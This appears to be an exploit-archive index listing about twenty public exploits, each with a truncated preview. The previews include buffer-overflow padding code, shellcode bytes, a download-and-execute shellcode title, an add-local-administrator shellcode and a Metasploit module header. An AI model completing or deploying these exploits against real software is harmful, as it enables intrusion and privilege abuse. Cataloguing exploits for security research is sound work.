IKEView.exe R60 - .elg Local (SEH)
IKEView.exe R60 - .elg Local SEH Exploit Title: IKEView.exe R60 localSEH Exploit Date: 17/09/2015 Exploit Author: cor3sm4sh3r Author email: cor3sm4sh3ratgmail.com Contact: https://in.linkedin.com/pub/shravan-kumar-ceh-oscp/103/414/450 Category: Local + Gr337z: hyp3rlinx for finding the bug +...
MS SQL Server 2000/2005 SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit
No description provided by source. % Function PaddingintLen Dim strRet, intSize intSize = intLen/2 - 1 For I = 0 To intSize Step 1 strRet = strRet & unescape"%u4141" Next Padding = strRet End Function Function PackDWORDstrPoint strTmp = replacestrPoint, "0x", "" PackDWORD = PackDWORD & UnEscape"%...
MS SQL Server 2000/2005 - SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer
MS SQL Server 2000/2005 - SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer % Function PaddingintLen Dim strRet, intSize intSize = intLen/2 - 1 For I = 0 To intSize Step 1 strRet = strRet & unescape"%u4141" Next Padding = strRet End Function Function PackDWORDstrPoint strTmp = replacestrPoin...
MS SQL Server 2000/2005 - SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer
% Function PaddingintLen Dim strRet, intSize intSize = intLen/2 - 1 For I = 0 To intSize Step 1 strRet = strRet & unescape"%u4141" Next Padding = strRet End Function Function PackDWORDstrPoint strTmp = replacestrPoint, "0x", "" PackDWORD = PackDWORD & UnEscape"%u" & MidstrTmp, 5, 2 & MidstrTmp, 7...
Free-MP3-CD-Ripper-1.1-DEP
Exploit Title: Free MP3 CD Ripper 1.1 Universal DEP Bypass Exploit Date: 27\08\2011 Author: C4SS!0 G0M3S Software Link: http://www.brothersoft.com/free-mp3-cd-ripper-84543.html Version: 1.1 from struct import pack from time import sleep import os from sys import exit print ''' Created By C4SS!0...
Wav-Player-1.1.3.6-(.pll)
Open the wav player, make a playlist and save it. Then, close the player and run this exploit to create the new playlist. When you open again wav player, you will see the calc. fichero = open"wvplayer.pll", "w" print "+ Creating exploit .pll..." fichero.write"A"1034 Padding fichero.write"t%dA" he...
GOM-Player-2.1.33.5071-ASX-File-Unicode
Exploit Title: GOM Player Crafted ASX File Unicode Stack Buffer Overflow and Arbitrary Code Execution. Version: 2.1.33.5071 Date: 30-11-2011 Author: Debasish Mandal Peter Van Eeckhoutte corelanc0d3r rawinput" Press Enter to generate the crafted ASX..." size = 2046 Shellcode WinExec "Calc.exe"...
Windows XP PRO SP3 - Full ROP calc shellcode
No description provided by source. / Shellcode: Windows XP PRO SP3 - Full ROP calc shellcode Author: b33f http://www.fuzzysecurity.com/ Notes: This is probably not the most efficient way but I gave the dll's a run for their money ; Greets: Donato, Jahmel OS-DLL's used: Base | Top | Size | Version...
Mozilla Thunderbird DLL Hijacking Exploit (dwmapi.dll)
No description provided by source. / Exploit Title: Mozilla Thunderbird DLL Hijacking Exploit dwmapi.dll Date: 26/08/2010 Author: h4ck3r47 http://twitter.com/hxteam Version: Latest Mozilla Thunderbird 3.1.2 Tested on: Windows XP SP3 The code is based on the exploit from TheLeader Vulnerable...
PHP <= 4.4.6 ibase_connect() Local Buffer Overflow Exploit
No description provided by source. ?php // PHP = 4.4.6 ibaseconnect & ibasepconnect local buffer overflow // poc exploit // windows 2000 sp3 en / seh overwrite // by rgod // site: http://retrogod.altervista.org if !extensionloadedinterbase dieonly works with interbase extension ; $scode= \xeb\x1b...
Win32 Mini HardCode WinExec&ExitProcess Shellcode 16 bytes
No description provided by source. Title: Win32 Mini HardCode WinExec&ExitProcess Shellcode 16 bytes ;Test on xpsp2cn,no zero in shellcode,it will run write.exe ;--------------------------------------------- push 7C808E9DH ;write ;68 xx xx xx xx ;program string in memory push 7C81CAA2H ;exitproce...
DVD X Player 5.5 Pro (SEH DEP + ASLR Bypass) Exploit
No description provided by source. ?php / Title: DVD X Player 5.5 Pro DEP + ASLR Bypass Exploit Date: Sep 08, 2011 Author: Rew [email protected] Discovered by: Blake http://www.exploit-db.com/exploits/17788/ Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup.exe Tested on: WinXP Pro SP3 +...
win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
No description provided by source. / Title: win32/xp pro sp3 EN 32-bit - add new local administrator 113 bytes Author: Anastasios Monachos secuid0 - anastasiosmatgmaildotcom Method: Hardcoded opcodes kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa Tested on: WinXP Pro SP3 EN 32bit - Buil...
Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode
No description provided by source. / Title: Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode Date: 2013-22-01 Author: RubberDuck Web: http://bflow.security-portal.cz http://www.security-portal.cz Tested on: Win 2k, Win XP Home SP2/SP3 CZ 32, Win 7 32/64 -- file is downloaded from URL...
Wordtrainer 3.0 .ORD File Buffer Overflow Vulnerability
No description provided by source. !/usr/bin/python +Exploit Title: Wordtrainer V3.0 .ORD File Buffer Overflow Vulnerability +Date: 12\04\2011 +Author: C4SS!0 G0M3S +Software Link: http://www.wordtrainer.net/software/files/wt307shwexe/wt307shw.exe +Version: 3.0 +Tested On: WIN-XP SP3 Brazilian...
Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core'...
Mocha LPD 1.9 - Remote Buffer Overflow DoS PoC
No description provided by source. !/usr/bin/python Mocha LPD v1.9 Remote Heap Overflow Exploit ol skool 'write 4' whoops, I said it was a DoS. My bad. btw yes, I know its 2010 :0 CVE: 2010-1687 tested on XP sp1 use anti debugging to see it work - !hidedebug zwqueryinformationprocess call trace:...
MPlayer Lite r33064 - m3u Buffer Overflow Exploit (DEP Bypass)
No description provided by source. !/usr/bin/perl +Exploit Title: MPlayer Lite r33064 m3u Buffer Overflow ExploitDEP BYPASS +Date: 24\07\2011 +Author: C4SS!0 and h1ch4m +Software Link: http://sourceforge.net/projects/mplayer-ww/files/MPlayerRelease/Revision%2033064/mplayerliter33064.7z/download...
PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
No description provided by source. ?php errorreporting0; PHP 6.0 Dev strtransliterate 0Day Buffer Overflow Exploit Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev Buffer Overflow Bug discovered by Pr0T3cT10n, [email protected] Exploited by TheLeader, Debug SP. Thanks: HDM...
Adobe Acrobat ActiveX Control 1.3.188 ActiveX Buffer Overflow
No description provided by source. source: http://www.securityfocus.com/bid/666/info There is a buffer overflow in the 1.3.188 version of the Adobe Acrobat ActiveX control pdf.ocx that ships with Acrobat Viewer 4.0. This ActiveX control is marked 'Safe for Scripting' within Internet Explorer 4.X...